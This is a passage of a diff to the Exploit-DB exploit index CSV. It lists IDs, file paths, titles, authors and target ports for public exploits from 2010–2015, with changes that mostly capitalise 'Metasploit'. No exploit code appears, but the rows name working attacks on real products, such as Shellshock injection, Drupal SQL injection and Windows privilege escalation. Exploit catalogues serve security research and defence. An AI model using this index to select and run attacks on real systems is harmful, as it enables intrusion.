Injection",2014-10-02,metasploit,linux,remote,21 +34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code Injection",2014-10-02,Metasploit,linux,remote,21 34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities",2014-10-02,Portcullis,php,webapps,80 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 -34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426 +34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,Metasploit,linux,remote,7426 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 @@ -31458,9 +31458,9 @@ id,file,description,date,author,platform,type,port 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload",2014-10-09,metasploit,php,remote,80 -34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command Execution",2014-10-09,metasploit,windows,remote,80 -34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443 +34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 +34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command Execution",2014-10-09,Metasploit,windows,remote,80 +34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,Metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0 34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0 @@ -31509,7 +31509,7 @@ id,file,description,date,author,platform,type,port 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0 34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - (BthPan.sys) Privilege Escalation",2014-10-15,metasploit,win_x86,local,0 +34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - (BthPan.sys) Privilege Escalation",2014-10-15,Metasploit,win_x86,local,0 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 34984,platforms/php/webapps/34984.py,"Drupal Core <= 7.32 - SQL Injection (1)",2014-10-16,fyukyuk,php,webapps,0 @@ -31544,16 +31544,16 @@ id,file,description,date,author,platform,type,port 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 -35020,platforms/win_x86/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win_x86,local,0 -35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0 +35020,platforms/win_x86/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,Metasploit,win_x86,local,0 +35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation",2014-10-20,Metasploit,linux,local,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla Store Directory 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 Admin Login Multiple SQL Injection Vulnerabilities",2010-11-26,ali_err0r,php,webapps,0 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0 -35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,metasploit,windows,remote,0 +35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,Metasploit,windows,remote,0 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-11-30,BugTracker.NET,asp,webapps,0 -35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,metasploit,php,remote,80 -35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,metasploit,multiple,remote,5555 +35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,Metasploit,php,remote,80 +35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,Metasploit,multiple,remote,5555 35035,platforms/cgi/webapps/35035.txt,"Awstats 6.x Apache Tomcat Configuration File Remote Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0 35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000 @@ -31601,7 +31601,7 @@ id,file,description,date,author,platform,type,port 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 -35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80 +35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,Metasploit,unix,remote,80 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation",2014-10-27,"Brandon Perry",jsp,webapps,8585 35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 @@ -31610,7 +31610,7 @@ id,file,description,date,author,platform,type,port 35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 -35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 +35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 @@ -31624,8 +31624,8 @@ id,file,description,date,author,platform,type,port 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 -35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0 -35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 +35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0 +35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Blind SQL Injection (Pre-Auth)",2014-10-28,tintinweb,php,webapps,80 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 @@ -31639,7 +31639,7 @@ id,file,description,date,author,platform,type,port 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0 35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80 35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80 -35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,metasploit,linux,remote,631 +35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,Metasploit,linux,remote,631 35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting",2010-12-15,"Richard Brain",php,webapps,0 35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 35118,platforms/php/webapps/35118.txt,"phpRS 'model-kits.php' SQL Injection",2010-12-16,KnocKout,php,webapps,0 @@ -31673,7 +31673,7 @@ id,file,description,date,author,platform,type,port 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 -35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) 'Patch' DLM",2014-11-03,metasploit,hardware,remote,9100 +35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100 35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 @@ -31698,10 +31698,10 @@ id,file,description,date,author,platform,type,port 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash PoC",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash PoC",2014-11-06,metacom,windows,dos,0 -35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler - Remote Code Execution",2014-11-06,metasploit,bsd,remote,0 +35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler - Remote Code Execution",2014-11-06,Metasploit,bsd,remote,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 -35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,metasploit,php,remote,80 +35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,Metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin n750 jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps,0 35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injection Vulnerabilities",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31710,7 +31710,7 @@ id,file,description,date,author,platform,type,port 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection",2011-01-11,jos_ali_joe,php,webapps,0 -35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 +35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,Metasploit,java,remote,8001 35193,platforms/php/webapps/35193.txt,"vldPersonals 2.7 - Multiple Vulnerabilities",2014-11-10,"Mr T",php,webapps,0 35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 @@ -31747,8 +31747,8 @@ id,file,description,date,author,platform,type,port 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption",2011-01-18,"Dan Rosenberg",linux,remote,0 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0 -35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0 -35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0 +35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,Metasploit,windows,local,0 +35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,Metasploit,windows,local,0 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 35238,platforms/multiple/webapps/35238.txt,"Gogs (users and repos q pararm) - SQL Injection Vulnerabilities",2014-11-14,"Timo Schmid",multiple,webapps,0 35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0 @@ -31795,8 +31795,8 @@ id,file,description,date,author,platform,type,port 35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 -35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,metasploit,android,remote,0 -35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection",2014-11-18,metasploit,php,remote,80 +35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,Metasploit,android,remote,0 +35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection",2014-11-18,Metasploit,php,remote,80 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337 @@ -31825,7 +31825,7 @@ id,file,description,date,author,platform,type,port 35324,platforms/php/webapps/35324.txt,"WordPress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 -35380,platforms/php/remote/35380.rb,"Pandora Fms SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80 +35380,platforms/php/remote/35380.rb,"Pandora Fms SQLi Remote Code Execution",2014-11-26,Metasploit,php,remote,80 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 @@ -31854,7 +31854,7 @@ id,file,description,date,author,platform,type,port 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0 35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Remote Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' NULL Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 -35356,platforms/linux/remote/35356.rb,"Hikvision DVR RTSP Request Remote Code Execution",2014-11-24,metasploit,linux,remote,554 +35356,platforms/linux/remote/35356.rb,"Hikvision DVR RTSP Request Remote Code Execution",2014-11-24,Metasploit,linux,remote,554 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35358,platforms/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 @@ -31931,8 +31931,8 @@ id,file,description,date,author,platform,type,port 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 35438,platforms/cgi/webapps/35438.txt,"CosmoShop 10.05.00 - Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - XSS",2014-12-02,"Kacper Szurek",php,webapps,80 -35440,platforms/osx/local/35440.rb,"Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,metasploit,osx,local,0 -35441,platforms/multiple/remote/35441.rb,"Tincd Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,metasploit,multiple,remote,655 +35440,platforms/osx/local/35440.rb,"Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 +35441,platforms/multiple/remote/35441.rb,"Tincd Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 @@ -32036,8 +32036,8 @@ id,file,description,date,author,platform,type,port 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0 35543,platforms/php/webapps/35543.txt,"WordPress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0 -35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80 -35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80 +35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,Metasploit,unix,remote,80 +35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,Metasploit,php,remote,80 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80 @@ -32132,7 +32132,7 @@ id,file,description,date,author,platform,type,port 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35664,platforms/php/webapps/35664.txt,"PHPList 2.10.x - 'email' Parameter Cross-Site Scripting Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 -35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload",2014-12-31,metasploit,php,remote,80 +35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload",2014-12-31,Metasploit,php,remote,80 35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl)",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 @@ -32142,7 +32142,7 @@ id,file,description,date,author,platform,type,port 35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 35668,platforms/php/webapps/35668.txt,"up.time Software 5 Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",php,webapps,0 35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 -35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,metasploit,windows,local,0 +35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,Metasploit,windows,local,0 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 @@ -32154,46 +32154,46 @@ id,file,description,date,author,platform,type,port 35685,platforms/multiple/remote/35685.txt,"Asterisk 1.8.x SIP INVITE Request User Enumeration Weakness",2011-05-02,"Francesco Tornieri",multiple,remote,0 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip File) Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 -35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 -35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 +35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 